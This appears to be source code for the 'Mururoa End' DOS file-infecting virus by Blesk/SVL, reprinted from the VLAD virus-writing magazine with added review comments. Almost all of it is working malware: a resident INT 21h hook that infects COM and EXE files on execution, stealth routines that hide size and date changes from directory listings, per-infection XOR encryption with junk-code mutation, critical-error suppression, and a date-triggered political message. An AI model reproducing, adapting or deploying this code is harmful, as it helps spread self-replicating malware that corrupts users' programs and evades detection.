Virus Labs & Distribution
VLAD #7 - Muraroa End


.286
	;********************************************************
        ;* This source was created by Blesk/SVL in 23.03.1996   *
	;********************************************************
        ;*              (C)  Blesk/SVL 1996/97                  *
        ;********************************************************

codes segment
             assume   cs:codes, ds:codes, ss:codes
        org   100h
startprog:
; First-generation carrier program (.COM, org 100h). The "host" is only the
; DOS terminate call at the end of this stub; the jump in front of it diverts
; execution to the virus entry point first.

; virlength  = size in bytes of the virus body (end_vir is defined outside
;              this excerpt).
; mem_to_res = amount subtracted from the MCB size field and the PSP
;              top-of-memory field when the code goes resident.
	virlength     		equ   end_vir-begin
        mem_to_res              equ   140h

	jmp	  svir                ; Jump to VIRUS
	nop
	nop
	nop
	mov	  ah,4ch              ; DOS terminate: the carrier's whole payload
	int	  21h

_virus:
begin:
; Loader / installer. Runs in the context of an infected host each time the
; host starts. Sequence: repair the host image, ask INT 21h whether a
; resident copy already answers, and if not, shrink the host's memory block,
; copy the body to the freed area and point INT 21h at it. Finally control is
; handed to the host's original entry point.
;
; Every data reference has the form (label-begin)+SI: SI is the run-time base
; of the virus body. SI and the values popped at _end1 are set up before this
; code runs (entry stub `svir`, outside this excerpt) -- NOTE(review): the
; stack layout is inferred from the pops below, confirm against `svir`.

;============== UTIL TO restore infected program in memory ==================
beg_c:
          call     avg_fuck            ; INT 20h hook/unhook sequence (see avg_fuck)
          pop      es                  ; peek the word on top of the stack into ES
          push     es                  ; (presumably the PSP segment) and keep it there
          mov      ax,es
          add      ax,10h              ; AX = that segment + 10h paragraphs

          add      [cs:((offset eps) - begin)+si],ax   ; relocate saved entry segment
          add      [cs:((offset ess) - begin)+si],ax   ; relocate saved stack segment
          cmp      byte ptr [cs:((offset com_exe) - begin)+si],'c'
          jnz      _exe_type
          ; .COM host: put the four saved bytes back at CS:100h and make the
          ; return target CS:100h with SS = CS.
          mov      ax,[cs:((offset orig_instr)-begin)+si]
          mov      [cs:100h],ax
          mov      ax,[cs:((offset orig_instr)-begin+2)+si]
          mov      [cs:102h],ax
          mov      [cs:((offset eps)-begin)+si],cs
          mov      [cs:((offset epo)-begin)+si],100h
          mov      [cs:((offset ess)-begin)+si],cs
_exe_type:
          pop      es
          push     es

          push     cs
          pop      ds                  ; DS = CS for the rest of the installer

;================ UTIL TO try if is virus now in memory =====================
; Residency handshake: AX=1996h is sent to INT 21h; the resident handler
; (_int21) answers by swapping AH/AL, so AX=9619h means "already installed".

        mov        ax,1996h
        int        21h
        cmp        ax,9619h
        jz         _instaled

;======================= UTIL TO get addr INT21h ============================
; AX=3521h returns the current INT 21h vector in ES:BX. It is stored twice:
; in or_21 (operand of the far CALL in `dos`) and in org_21 (operand of the
; far JMP at To_21).

        push     bx
        push     es
        mov      ax,3521h
        int      21h
        mov      word ptr [cs: (or_21-begin)+si],bx
        mov      word ptr [cs: (or_21-begin)+2+si],es
        mov      word ptr [cs: (org_21-begin)+si],bx
        mov      word ptr [cs: (org_21-begin)+2+si],es
        pop      es
        pop      bx
;===================== UTIL TO GET MEM FOR VIRUS ============================
; ES is set two paragraphs below the segment on top of the stack, so
; ES:10h.. addresses the paragraph just below that segment (its memory
; control block if the segment is the PSP) and ES:22h addresses offset 2 of
; the segment itself (PSP top-of-memory word).

        pop        es
        push       es

        push       ds
        mov        ax,es
        dec        ax
        dec        ax
        mov        es,ax
        cmp        byte ptr [es:10h],5ah   ; block type 'Z' = last block in the chain
        jz         no_end1
_end2:  jmp        _end1                   ; not the last block: do not install
no_end1:
        mov        ax,[es:13h]             ; block size field
        sub        ax,mem_to_res
        jc         _end2                   ; block smaller than mem_to_res: give up
        mov        [es:13h],ax             ; shrink the block ...
        sub        word ptr [es:22h],mem_to_res   ; ... and lower the top-of-memory word
        mov        es,[es:22h]             ; ES = segment of the area just cut off
        pop        ds
;===================== UTIL TO move virus in MEMORY =========================
; Copies virlength bytes from DS:SI (DS = CS, SI = body base) to ES:0, so the
; resident copy starts at offset 0 of its own segment.

        xor        di,di
        cld
        push       si
        mov        cx,virlength
        repz       movsb
        pop        si

;======================= UTIL TO INITIALEZE VIRUS ===========================
; AX=2521h sets the INT 21h vector to DS:DX = resident segment : (_int21-begin).

        mov        ax,2521h
        push       es
        pop        ds
        mov        dx,(_int21-begin)
        int        21h

;=========== Pop and go to original ============
; Unwinds the values saved before the installer ran, loads the host's stack
; segment and far-returns to the host entry point (eps:epo).

_instaled:
_end1:
             pop      es
_p11:        pop      bp
_p21:        pop      ds
_p31:        pop      es
_p41:        pop      dx
_p51:        pop      cx
_p61:        pop      bx
_p71:        pop      ax
             pop      si

             mov        ss,[cs:((offset ess)-begin)+si]
             push       [cs:((offset eps)-begin)+si]   ; return segment
             push       [cs:((offset epo)-begin)+si]   ; return offset
             retf

;############################################################################

;==================== Code to CALL and JMP to orig 21H ======================
; Two hand-assembled far transfers whose 4-byte operands are patched by the
; installer with the INT 21h vector that was current before hooking.
;   dos   : PUSHF + CALL FAR or_21 -- emulates "int 21h" against the previous
;           handler and returns to the caller with a near RET.
;   To_21 : JMP FAR Org_21 -- hands a request over to the previous handler
;           without coming back.

dos:
             pushf
             db       9ah    ; CALL xxxx:xxxx
or_21:	     dd       0
             ret
To_21:
             db       0eah   ; JMP  xxxx:xxxx
Org_21:
             dw       0,0

;============= Change DTA ==================================
; Size/date stealth for handle-style find first/next results.
; Fetches the current DTA (AH=2Fh -> ES:BX) and inspects the word at DTA+18h
; (file date). If the top two bits of its high byte are both set -- the mark
; written by Mark_file -- the bits are cleared and virlength is subtracted
; from the 32-bit size at DTA+1Ah/1Ch, so a directory listing shows the
; pre-infection date and size while the handler is resident.
; All registers and flags are preserved.
change_dta:  pushf
             push       ax
             push       bx
             push       cx
             push       dx
             push       es
             mov        ah,2fh
             call       dos
             mov        dx,[es: word ptr bx+18h]
             and        dh,0c0h
             cmp        dh,0c0h                 ; both marker bits set?
             jnz        not_inf_dta;
             mov        dx,[es: word ptr bx+18h]
             and        dh,3fh                  ; hide the marker bits
             mov        [es: word ptr bx+18h],dx
             sub        word ptr [es: word ptr bx+1ah],virlength
             sbb        word ptr [es: word ptr bx+1ch],0
not_inf_dta: pop        es
             pop        dx
             pop        cx
             pop        bx
             pop        ax
             popf
             ret
;=======find first via handle=============
; Reached from _int21 for AH=4Eh/4Fh with the caller's flags still pushed.
; Runs the real DOS call; on success (carry clear) the DTA entry is patched
; by change_dta. RETF 2 returns to the interrupt caller and drops the flags
; word of the interrupt frame, so the flags produced by DOS are kept.
ffvh:        popf
             call       dos
             jc         ffvh2
             call       change_dta
ffvh2:       retf       2

;======find first/next via fcb=============================
; FCB counterpart of the size/date stealth, reached from _int21 for
; AH=11h/12h. After the real DOS call returns AL=0 (entry found) the DTA is
; fetched with AH=2Fh. A first byte of 0FFh is treated as the extended-FCB
; marker and BX is advanced by 8 before the fields are accessed.
; If the word at BX+18h carries both marker bits (see Mark_file) they are
; cleared and virlength is subtracted from the 32-bit value at BX+1Ch/1Eh.
ffvfcb:      popf
             call       dos
             pushf
             cmp        al,00
             jnz        no_found
             push       ax
             push       bx
             push       cx
             push       dx
             push       es
             mov        ah,2fh
             call       dos
             mov        al,[es: word ptr bx]
             cmp        al,0ffh
             jnz        @ew
             add        bx,8
@ew:
             mov        dx,[es: word ptr bx+18h]
             and        dh,0c0h
             cmp        dh,0c0h                 ; both marker bits set?
             jnz        not_inf_dta2;
             mov        dx,[es: word ptr bx+18h]
             and        dh,3fh                  ; hide the marker bits
             mov        [es: word ptr bx+18h],dx
             sub        word ptr [es: word ptr bx+1ch],virlength
             sbb        word ptr [es: word ptr bx+1eh],0
not_inf_dta2:
             pop        es
             pop        dx
             pop        cx
             pop        bx
             pop        ax

no_found:    popf
             iret
;==========================================================
Stupid_Tex_For_Now_:       ; May be not 8))) 
             db    ' I am in LOVE now... ZUZANKA B.B. in Slovakia <:)<8< '
;############################################################################
;              !!!!!!!!!!!!! here is my int 21h !!!!!!!!!!!!!
;############################################################################
; Resident INT 21h handler and its two jump trampolines (the conditional
; jumps in the dispatcher only reach short distances).
;
; Requests intercepted:
;   AX=1996h       residency handshake, answered with AX=9619h
;   AX=4B00h       load-and-execute: the program being started is examined
;                  and possibly infected (_infect), then the call proceeds
;   AH=4Eh / 4Fh   find first/next (handle style)  -> ffvh   (stealth)
;   AH=11h / 12h   find first/next (FCB style)     -> ffvfcb (stealth)
; Everything else is passed to the previous handler untouched.
ffvh3:       jmp        ffvh
ffvfcb1:     jmp        ffvfcb
_int21:
             pushf
             cmp        ax,1996h
             jnz        _next
             xchg       ah,al                   ; 1996h -> 9619h
             popf
             sti
             iret
_next:
             cmp        ax,4b00h
             jnz        _infe
             jmp        _infect
_infe:
             cmp        ah,4eh
             jz         ffvh3

             cmp        ah,4fh
             jz         ffvh3

             cmp        ah,12h
             jz         ffvfcb1

             cmp        ah,11h
             jz         ffvfcb1


;========================================================
_jmp_dos:
             popf                               ; restore caller flags saved at _int21
             jmp        To_21                   ; continue in the previous INT 21h handler
;========================================================
;############################################################################
include files.inc
;############################################################################
;############################################################################
;============= Util to add virus to open file =====================
add_to_file:
; Appends a freshly mutated, encrypted copy of the body to the open file.
; Works on the resident copy (CS = DS = ES, body at offset 0). Three phases:
;   1. For every (offset, count) record in table_reloc, `count` two-byte junk
;      instructions are written into the body at that offset via DEADCODE.
;   2. A non-zero random byte is stored in _value and bytes 0..(end_c-begin)
;      of the body are XORed with it, 40h bytes at a time through `buff`,
;      each block being written to the end of the file.
;   3. The bytes from end_c up to buff (the part left unencrypted) are copied
;      to buff and written after the encrypted part.
; end_file / write_file are helpers not shown in this excerpt (presumably
; from files.inc): seek-to-end and write CX bytes from DS:DX.
; Analysis note: the key is a single byte, so the encrypted region differs
; from the plain body by one constant XOR value per infection.
	     call           end_file
	     push           bp
             push           es
             push           ds
             push           di
             push           si

             push           cs
             pop            es
             push           cs
             pop            ds

             ; ---- phase 1: refill the junk slots -------------------------
             mov            cx,[cs: word ptr (num_reloc-begin)]   ; number of records
             mov            bx,(table_reloc-begin)

R_continue:
             push           cx
             push           bx

             mov            di,[cs: word ptr bx]      ; slot offset inside the body
             mov            dl,[cs: byte ptr bx+2]    ; number of 2-byte entries in the slot
             xor            dh,dh
zt4:         call           DEADCODE
             add            di,2
             dec            dx
             jnz            zt4

             pop            bx
             add            bx,3  ;<= go to next position in TABLE
             pop            cx
             dec            cx
             jnz            R_continue



             ; ---- phase 2: pick a key and write the encrypted part -------
rtyt:
             call           rnd_byte
             cmp            al,0
             jz             rtyt                   ; key 0 would leave the body unchanged
             mov            [cs:byte ptr (_value-begin)],al

             mov            di,(buff-begin)         ; Move
             xor            si,si

             xor            dx,dx
             mov            ax,(end_c-begin)       ; Crypt
             mov            bx,40h
             div            bx
             mov            cx,ax                  ; Count how much blocks
ccykl:
             mov            bx,40h
             mov            di,(buff-begin)
cccykl:      mov            al,[si]                ; Crypt 1 40h block
             xor            al,[cs:byte ptr (_value-begin)]
             mov            [di],al                ;
             inc            si
             inc            di
             dec            bx
             jnz            cccykl                 ; Loop to Crypt routine
             push           cx
             push           dx
             push           si
             push           di
             call           end_file
             mov            dx,(buff-begin)        ; And Save that BLOCK
             mov            cx,40h
             call           write_file
             call           end_file
             pop            di
             pop            si
             pop            dx
             pop            cx
             dec            cx
             jnz            ccykl                  ; Last COMPLET 40h block

                                                   ; yes => Crypt last few
             cmp            dx,0                   ; DX = remainder of the division above
             jz             _no_last_few
             push           dx
                                                   ; bytes (les than 40h)
             mov            di,(buff-begin)
cykl:        mov            al,[si]                ; Crypt block
             xor            al,[cs:byte ptr (_value-begin)]
             mov            [di],al                ;
             inc            si
             inc            di
             dec            dx
             jnz            cykl                   ; Loop to Crypt routine
             call           end_file
             mov            dx,(buff-begin)        ; And Save last uncomplet
             pop            cx                     ; BLOCK
             call           write_file
             call           end_file
             ; ---- phase 3: append the unencrypted tail (SI now = end_c) --
_no_last_few:
             mov            cx,(buff-end_c)     ; Copy decryptor
             push           cs                     ; to buff
             push           cs                     ;
             pop            ds                     ;
             pop            es                     ;
             mov            di,(buff-begin)        ;
             cld                                   ;
             repz           movsb                  ;

             call           end_file
             mov            cx,(buff-end_c)        ;
             mov            dx,(buff-begin)        ; AND save it !!!!
             call           write_file             ;
             call           end_file
             pop            si
             pop            di
             pop            ds
             pop            es
             pop            bp
             ret
;=====================================================================
;############################################################################
;############################################################################
;############################################################################
;================ Util to mark infected file via date ================
Mark_file:
; Stamps the open file as infected through its date word.
; AX=5700h reads the file time/date (CX = time, DX = date); the top two bits
; of the date's high byte are set and the pair is written back with AX=5701h.
; In the DOS date layout these are the two highest bits of the year field,
; so a marked file shows a year of 2076 or later when listed without the
; resident handler active. change_dta / ffvfcb test for exactly these bits.
             mov        ax,5700h
             mov        bx,[cs:( handle - begin )]
             call       dos
             or         dh,0c0h
             mov        ax,5701h
             call       dos
             ret
;=====================================================================
;############################################################################
;############################################################################
;############################################################################
;===================== Data used by VIRUS ============================
EXE_HEADER:  db         'MZ'                     ;header of exe file
lastpage:    dw         ?                        ;Bytes in last page
nopages:     dw         ?                        ;Count of pages
RELOC:       dw         ?                        ;Count of relocate items
HederSize:   dw         ?                        ;Heder size
MinMem:      dw         ?
MaxMem:      dw         ?
ReloSS:      dw         ?                        ;Initial SS
ReloSP:      dw         ?                        ;Initial SP
CeckSum:     dw         ?                        ;DOS 3.00+ not use it !!!!
StartIP:     dw         ?                        ;Starting IP
StartCS:     dw         ?                        ;Starting CS
OfsRelo:     dw         ?                        ;Relocation table's offset
OVRType:     dw         ?                        ;0=Main segment
nope  :      dw         ?
pklite:      dw         ?                        ;PKLITE = PK sign .. Don't
                                                 ;INFECT !!!!!
;############################################################################
Old_21     : dd ?
Time       : dw ?
date       : dw ?
Handle     : dw ?
virussize    equ        (offset end_vir)-(offset _virus)
com_exe  : dw 'c'
;############################################################################
; Date-triggered message routine, called on every intercepted program start
; (see _infect). INT 1Ah/AH=04h reads the real-time clock date (DH = month,
; DL = day, both BCD). On 4, 8 or 14 May it beeps, prints the boxed message
; text1..text5 with `line` drawing the horizontal borders, waits for a key
; (AH=08h) and beeps again. On any other date it returns immediately.
; AX, DX, CX and DS are preserved. No file or disk is modified here.
_vypis:      push       ax
             push       dx
             push       cx
             push       ds

             push       cs
             pop        ds

             mov        ah,04
             int        1ah
             cmp        dh,05h                    ; Month = 5 ???
             jnz        not_vypis
             cmp        dl,04h                    ; Day = 4 ???
             jz         y_vypis
             cmp        dl,08h                    ; Day = 8 ???
             jz         y_vypis
             cmp        dl,14h                    ; Day = 14 ???
             jz         y_vypis
             jmp        not_vypis
y_vypis:
             call       beep

             mov        dx,(text1-begin)
             mov        ah,09h
             call       dos
             call       line                  ; 49 x 
             mov        dx,(text2-begin)
             mov        ah,09h
             call       dos
             call       line                  ; 49 x 
             mov        dx,(text3-begin)
             mov        ah,09h
             call       dos
             call       line                  ; 49 x 
             mov        dx,(text4-begin)
             mov        ah,09h
             call       dos
             call       line                  ; 49 x 
             mov        dx,(text5-begin)
             mov        ah,09h
             call       dos

             mov        ah,08                     ; wait for a keypress
             call       dos
             call       beep

not_vypis:
             pop        ds
             pop        cx
             pop        dx
             pop        ax

             ret
;==========================================================
line:
; Prints the same character 49 times through DOS function 06h (direct
; console output of DL); used for the horizontal borders of the message box.
; NOTE(review): the character literal below is empty in this copy of the
; source; a nearby comment ("0cdh - line") suggests it was the box-drawing
; character 0CDh, lost in text conversion -- confirm against another copy.
             mov        cx,49
lllll:       mov        dl,''
             mov        ah,06h
             call       dos
             loop       lllll
             ret
;==========================================================
beep :
; Sounds the speaker once: BIOS teletype output (INT 10h, AH=0Eh) of the
; BEL character 07h. AX is preserved.
       push ax
       mov ax,0e07h
       int 10h
       pop ax
       ret
;==========================================================
; 0cdh - line
text1:       db         13,10
             db         0c9h,'$'
text2:
             db         0bbh,13,10
             db         0bah,'   I have one mesage to all people on earth :    ',0bah
             db         13,10
             db         0cch,'$'
text3:       db         0b9h,13,10
             db         0bah,' All French nuc. test`s was STOPED. But MURUROA  ',0bah
             db         13,10
             db         0bah,'  IS DEAD !!!!! I am a coder of HELL FIRE and I  ',0bah
             db         13,10
             db         0bah,'   BRING  YOU  >>>>>> FIRE <<<<<< By Blesk/SVL   ',0bah
             db         13,10
             db         0bah,'NOTE:    Name of this virus is [MURUROA_END]     ',0bah
             db         13,10
             db         0bah,' By Blesk from Slovak Virus Laboratories at .SK  ',0bah
             db         13,10
             db         0bah,' Real name of BOZA is BIZATCH.. STUPID A-VERS !!!',0bah
             db         13,10
             db         0bah,'    PLUTONIUM IS BETTER IN POWER-PLANT !!!!      ',0bah
             db         13,10
             db         0bah,' My greet to: VYVOJAR,SVL,VLAD,SKIMS,40-hex,IR   ',0bah
             db         13,10
             db         0cch,'$'
text4:
             db         0b9h,13,10
             db         0bah,' And to some my friends:    DJ.Milan,DJ.Maros,   ',0bah
             db         13,10
             db         0bah,' DJ.Babula(Baby),TINA-huhu,DURO,LACI,Duffy,Kaaa, ',0bah
             db         13,10
             db         0bah,' Stano ...and more... A zdravim Mira Trnku  8))  ',0bah
             db         13,10
             db         0c8h,'$'
text5:
             db         0bch,13,10
             db         13,10,'$'

;############################################################################
;=====================================================================
;############################################################################
;############################################################################
;############################################################################
;============== Utils to infect files !!!! ===========================
_infect:
; Entered from _int21 when a program is started (AX=4B00h, DS:DX = path of
; the program). Saves the caller's registers, runs the date-triggered
; message check and the infection attempt, restores the registers and lets
; the original exec request continue through _jmp_dos.
             push       ax
             push       bx
             push       cx
             push       es
             push       dx
             push       ds
             call       _vypis
             call       infect_files
             pop        ds
             pop        dx
             pop        es
             pop        cx
             pop        bx
             pop        ax
             jmp        _jmp_dos
;=====================================================================
; ======================= INT_24.INC By Blesk/SVL ========================

int24:          dw      0,0

;============ Hook int 24h and store original vector =====================
Hook_24:
; Replaces the DOS critical-error handler (INT 24h) for the duration of an
; infection attempt. The vector is read and written directly in the
; interrupt table at 0000:0090h; the previous value is kept in `int24`.
; With INT_24 installed, a failing disk operation (for example a write to a
; write-protected disk) returns an error instead of showing the usual
; Abort/Retry/Fail prompt. ES and AX are preserved.
                push    es
                push    ax
         ; ======== Save current INT 24 vector ==============
                xor     ax,ax
                mov     es,ax
                mov     ax,[es: word ptr (24h*4)]
                mov     [cs: word ptr (int24-begin)],ax
                mov     ax,[es: word ptr (24h*4+2)]
                mov     [cs: word ptr (int24-begin+2)],ax
         ; ======== Set new INT 24 vector = CS:INT_24 =======
                mov     ax,(INT_24-begin)
                mov     [es: word ptr (24h*4)],ax
                push    cs
                pop     ax
                mov     [es: word ptr (24h*4+2)],ax
         ; ======== Restore registers =======================
                pop     ax
                pop     es
                ret

;============ UnHook int 24h and restore original vector =================
UnHook_24:
; Writes the INT 24h vector saved by Hook_24 (in `int24`) back into the
; interrupt table at 0000:0090h. ES and AX are preserved.
                push    es
                push    ax
         ; ==================================================
                xor     ax,ax
                mov     es,ax
                mov     ax,[cs: word ptr (int24-begin)]
                mov     [es: word ptr (24h*4)],ax
                mov     ax,[cs: word ptr (int24-begin+2)]
                mov     [es: word ptr (24h*4+2)],ax
         ; ======== Restore INT 24 vector =====================
                pop     ax
                pop     es
                ret
;==============================MY int 24h=================================
INT_24:
; Replacement critical-error handler: always answers AL=3 ("fail the call"),
; so DOS reports the error to the caller without prompting the user.
                mov     al,03
                iret
;=========================================================================
infect_files:
; Infection driver for the program named by DS:DX.
;   1. Critical errors are silenced (Hook_24).
;   2. FINDSTR checks the file name against the exclusion table; only when
;      nasiel_s stays 0FFh (no table word matched) does the attempt continue.
;   3. The file is opened and its first 4 bytes are read; a leading 'MZ'
;      (5A4Dh) selects the EXE path, anything else the COM path.
;   4. The file is closed and INT 24h is restored.
; open_file / read_file / close_file are not shown in this excerpt
; (presumably from files.inc).
             call       Hook_24
             call       findstr
             cmp        byte ptr [cs:((offset nasiel_s)-begin)],0ffh
             jz         can_infect
             jmp        NoInfecting
can_infect:
             call       open_file

             mov        cx,4h
             mov        dx,((offset exe_header)-begin)
             call       read_file

             cmp        word ptr [cs:((offset exe_header)-begin)],5a4dh
             jnz        com_infect
             call       exe_infect
             jmp        clo_infect
com_infect:  call       infect_com
clo_infect:  call       close_file
NoInfecting:
             call       UnHook_24
             ret
;=====================================================================
infect_com:
; .COM infection path.
;   - The first 4 bytes of the file are saved in orig_instr (the loader puts
;     them back at CS:100h when the host runs).
;   - Size check: the attempt is abandoned if file size + virlength carries
;     out of 16 bits.
;   - Re-infection check: the last word of the file is read (seek to end-2);
;     1111h means "already infected". NOTE(review): presumably the final word
;     of the appended body; its definition is outside this excerpt.
;   - The first 3 bytes are overwritten with E9h + 16-bit displacement, a
;     near JMP to `svir` inside the body appended at the old end of file.
;   - `delta` is set to old size + 100h, then add_to_file appends the body
;     and Mark_file sets the date marker.
; begin_file / end_file / read_file / write_file are not shown in this
; excerpt; end_file is used as if it returned the file size in AX
; (DX:AX in exe_infect) -- TODO confirm.
; File artefacts for analysis: E9h at offset 0, word 1111h at the end of the
; file, date marker bits (see Mark_file).
             call       begin_file
             jnc         cic2
             jmp         cic
cic2:
             mov        cx,4h
             mov        dx,((offset exe_header)-begin)
             call       read_file
             jc         cic
             push       cs
             pop        ds
             mov        ax,[ds:((offset exe_header)-begin)]
             mov        [ds:((offset orig_instr)-begin)],ax
             mov        ax,[ds:((offset exe_header)-begin+2)]
             mov        [ds:((offset orig_instr)-begin+2)],ax
             call       end_file
             add        ax,virlength
             jc         cant_infect_com
             sub        ax,virlength

             mov        bx,[cs:((offset handle)-begin)]
             mov        cx,0ffffh               ; CX:DX = -2
             mov        dx,0fffeh
             mov        ax,4202h                ; seek relative to end of file
             call       dos

             mov        dx,((offset exe_header)-begin)
             mov        cx,2
             call       read_file

             cmp        word ptr [cs: ((offset exe_header)-begin)],1111h
             jz         cant_infect_com
             call       end_file
             push       ax
             call       begin_file
             pop        ax

             sub        ax,3                    ; displacement is relative to the byte after the 3-byte JMP
             add        ax,(svir-begin)
             mov        [cs:((offset exe_header)-begin+1)],ax
             mov        al,0E9h                 ; near JMP opcode
             mov        [cs:((offset exe_header)-begin)],al
             mov        cx,3h
             mov        dx,(offset exe_header)-begin
             mov        byte ptr [cs:((offset com_exe)-begin)],'c'


             call       write_file

             jc         cic
             call       end_file
             jc         cic
             add        ax,100h
             mov        [cs: word ptr (delta-begin)],ax
             sub        ax,100h
             call       add_to_file
             call       mark_file

cic:
cant_infect_com:

          ret
;==========================================================
exe_infect:
; MZ-EXE infection path.
;   - Re-infection check: last word of the file == 1111h -> skip.
;   - Reads 20h bytes of header into EXE_HEADER. Files are skipped when the
;     overlay number is non-zero or the word at header offset 1Eh (label
;     `pklite`) equals the constant 'PK'.
;   - The original SS, IP and CS header values are saved in ess / epo / eps
;     for the loader.
;   - Header changes: initial SS +10h, MinMem and MaxMem +100h (MaxMem is
;     clamped to 0FFFFh on carry), page count / last-page bytes increased by
;     virussize, entry point CS:IP recomputed from (file size - header size)
;     so that execution starts at `svir` in the appended body.
;   - The first 1Ch header bytes are written back, the body is appended
;     (add_to_file) and the date marker is set (Mark_file).
; The skip branches jump to `cic`, the shared exit label in infect_com.
; File artefacts for analysis: entry point inside the last virussize bytes of
; the image, word 1111h at end of file, date marker bits (see Mark_file).
             mov        cx,0ffffh               ; CX:DX = -2
             mov        dx,0fffeh
             mov        ax,4202h                ; seek relative to end of file
             call       dos

             mov        cx,2
             mov        dx,(offset buff)-begin
             call       read_file
             cmp        word ptr [cs:((offset buff)-begin)],1111h
             jz         cic

             call       begin_file

             mov        cx,20h
             mov        dx,(offset exe_header)-begin
             call       read_file

             cmp        word ptr [cs:((offset ovrtype)-begin)],0000
             jnz        cic
             cmp        word ptr [cs:((offset pklite)-begin)],'PK'
             jz         cic

             mov        bx,[cs:((offset reloSS)-begin)]
             mov        [cs:((offset ess)-begin)],bx
             mov        bx,[cs:((offset startIP)-begin)]
             mov        [cs:((offset epo)-begin)],bx
             mov        bx,[cs:((offset startCS)-begin)]
             mov        [cs:((offset eps)-begin)],bx


             add        word ptr [cs:((offset reloSS)-begin)],10h
             add        word ptr [cs:((offset minmem)-begin)],100h
             add        word ptr [cs:((offset maxmem)-begin)],100h
             jnc        NoCaryMem
             mov        word ptr [cs:((offset maxmem)-begin)],0ffffh
NoCaryMem:
             mov        byte ptr [cs:((offset com_exe)-begin)],'E'

             ; page count += virussize / 200h; the remainder is added to the
             ; last-page byte count and renormalised to 0..1FFh
             mov        ax,virussize
             mov        bx,200h
             xor        dx,dx
             div        bx
             add        word ptr [cs:((offset nopages)-begin)],ax
             add        dx,word ptr [cs:((offset lastpage)-begin)]
             xchg       ax,dx
             xor        dx,dx
             div        bx
             mov        word ptr [cs:((offset lastpage)-begin)],dx
             add        word ptr [cs:((offset nopages)-begin)],ax
             call       end_file
             push       si
             push       di

             mov        di,dx                   ; DI:SI = value returned by end_file in DX:AX
             mov        si,ax

             mov        ax,[cs:((offset hedersize)-begin)]
             mov        bx,10h
             mul        bx                      ; DX:AX = header size in bytes

             sub        si,ax
             sbb        di,dx                   ; DI:SI = size of the load image
             mov        dx,di
             mov        ax,si
             pop        di
             pop        si
             mov        bx,10h
             div        bx                      ; AX = paragraphs, DX = byte remainder
             mov        [cs:  word ptr (delta-begin)],dx
             add        dx,(svir-begin)  ; START at Svir
             mov        [cs:((offset startIP)-begin)],dx
             mov        [cs:((offset startCS)-begin)],ax

             call       begin_file
             mov        cx,1ch
             mov        dx,((offset EXE_header)-begin)
             call       write_file
             call       end_file
             call       add_to_file
             call       Mark_file

@44:         ret


;==========================================================



;############################################################################
;############################################################################
My_Favourite_paper_magazine:   db ' I love PC Revue .... '

;################################################################
;################################################################
;###    Here is located RELOC table to put dumb instruction   ###
;################################################################
;################################################################

num_reloc:
  dw    38
table_reloc:
  dw  dumb1-begin
  db  5
  dw  dumb2-begin
  db  23
  dw  dumb3-begin
  db  9
  dw  dumb4-begin
  db  3
  dw  dumb5-begin
  db  6
  dw  dumb6-begin
  db  16
  dw  dumb7-begin
  db  7
  dw  dumb8-begin
  db  3
  dw  dumb9-begin
  db  3
  dw  dumb10-begin
  db  9
  dw  dumb11-begin
  db  1
  dw  dumb12-begin
  db  3
  dw  dumb13-begin
  db  32
  dw  dumb14-begin
  db  4
  dw  dumb15-begin
  db  5
  dw  dumb16-begin
  db  5
  dw  dumb17-begin
  db  15
  dw  dumb18-begin
  db  8
  dw  dumb19-begin
  db  3
  dw  dumb20-begin
  db  4
  dw  dumb21-begin
  db  8
  dw  dumb22-begin
  db  6
  dw  dumb23-begin
  db  1
  dw  dumb24-begin
  db  1
  dw  dumb25-begin
  db  2
  dw  dumb26-begin
  db  13
  dw  dumb27-begin
  db  3
  dw  dumb28-begin
  db  3
  dw  dumb29-begin
  db  3
  dw  dumb30-begin
  db  3
  dw  dumb31-begin
  db  3
  dw  dumb32-begin
  db  3
  dw  dumb33-begin
  db  3
  dw  dumb34-begin
  db  3
  dw  dumb35-begin
  db  3
  dw  dumb36-begin
  db  3
  dw  dumb37-begin
  db  3
  dw  dumb38-begin
  db  3

;################################################################
;======================== FIND.INC Thanx to SVL ==========================


analiza:
; Strips the directory part from a zero-terminated path.
; In:  DS:DX -> path string
; Out: DS:DX -> character after the last '\' (unchanged if there is none)
; AX and SI are preserved. The candidate start is kept on the stack and
; replaced each time a backslash is passed.
     ;      ds:dx  =>'c:\path\name.ext',0
      push  ax
      push  si
      push  dx
      push  dx  ;   ds:dx = ds:si
      pop   si
analiza2:
      cmp   byte ptr [si],'\'
      jz    lomitko
      cmp   byte ptr [si],0
      jz    end_name
      inc   si
      jmp   analiza2
lomitko:
      pop   ax                 ; discard the previous candidate
      inc   si
      push  si                 ; new candidate = byte after this backslash
      jmp   analiza2
end_name:
      pop   dx
      pop   si
      pop   ax
     ;      ds:dx  =>'name.ext',0
      ret

;-----------------------------------------------------------------------------
;Procedure FINDSTR checks whether the string at address DS:DX contains a word
;from the table.
; Input:  DS:DX -> string
; Output: NASIEL_S = 0 if it contains one, NASIEL_S = FFh if it does not

; File-name filter used before infection.
; Entry FINDSTR : sets nasiel_s to 0FFh, strips the path with `analiza` and
;                 compares the name against the word list at `Tab`.
; Entry FINDSTR1: jumps straight to the comparison with the caller's SI/DI;
;                 it does not reset nasiel_s.
; Table format: words separated by a 0 byte, the whole list ended by a 1 byte.
; Name characters are case-folded before comparison. SI is never advanced in
; the loop, so every word is compared starting at the first character of the
; name. On a match nasiel_s is set to 0; otherwise it is left as it was.
; All general registers are preserved (pusha/popa).
FINDSTR1 proc near
         pusha
         jmp findstr2

FINDSTR :
         pusha
         mov  byte ptr [cs:((offset nasiel_s)-begin)],0ffh
         call analiza
         push dx
         pop  si
         mov di,(offset tab-begin)
findstr2:mov bp,si
 compar0:mov cx,0                   ; CX = characters matched in the current word
 compar1:xor bx,bx                  ; BX = index into both word and name
 compar2:mov ah,byte ptr cs:[di+bx] ;AH= char from table
         cmp ah,0                   ; New word ????
         jnz  nextwor
         cmp cx,0
         jnz found
         jz  nextword
nextwor:
         cmp ah,1                   ; list terminator reached
         jz found_1
         mov al,byte ptr ds:[si+bx] ;AL= char from checked string

 ; Case folding: OR 20h sets bit 5, i.e. letters are folded to lower case
 ; (the table words are lower case)

         cmp al,5bh             ;Make upcase of chars
         jns compar3
         cmp al,41h
         js compar3
         or al,20h

 compar3:
        cmp al,0
        jnz next_w              ;end of name ??? (try next)
        cmp cx,0
        jnz found
        jnz nextword
 next_w:
        inc bx
        inc dx
        inc cx
        cmp al,ah
        jz  compar2

 nextword:mov ah,cs:[di]         ; skip DI forward to the start of the next word
        inc di
        cmp ah,1                 ;If it is last word then mark NOT contain
        jz found_1
        cmp ah,0                 ;begin of new word ????
        jnz nextword
